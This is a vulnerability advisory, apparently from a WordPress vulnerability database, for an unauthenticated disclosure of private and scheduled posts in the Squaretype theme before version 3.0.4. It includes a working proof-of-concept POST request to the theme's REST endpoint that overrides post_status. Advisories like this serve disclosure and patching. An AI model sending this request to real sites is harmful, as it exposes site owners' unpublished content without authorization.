Themes Vulnerabilities
Squaretype Modern Blog < 3.0.4 - Unauthenticated Private/Schedule Posts Disclosure
Description
The theme allows unauthenticated users to manipulate the query_vars used to retrieve the posts to display in one of its REST endpoint, without any validation. As a result, private and scheduled posts could be retrieved via a crafted request.
Proof of Concept
POST /wp-json/csco/v1/more-posts Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 186 action=csco_ajax_load_more&page=1&posts_per_page=10&query_data=%7b%22location%22%3a%22%22%2c%22infinite_load%22%3afalse%2c%22query_vars%22%3a%7b%22post_status%22%3a%20%22private%22%7d%7d
Affects Themes
Fixed in 3.0.4
References
CVE
Classification
Type
IDOR
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Emil Kylander Edwartz
Submitter
Emil Kylander Edwartz
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-10-11 (about 2 years ago)
Added
2021-10-11 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)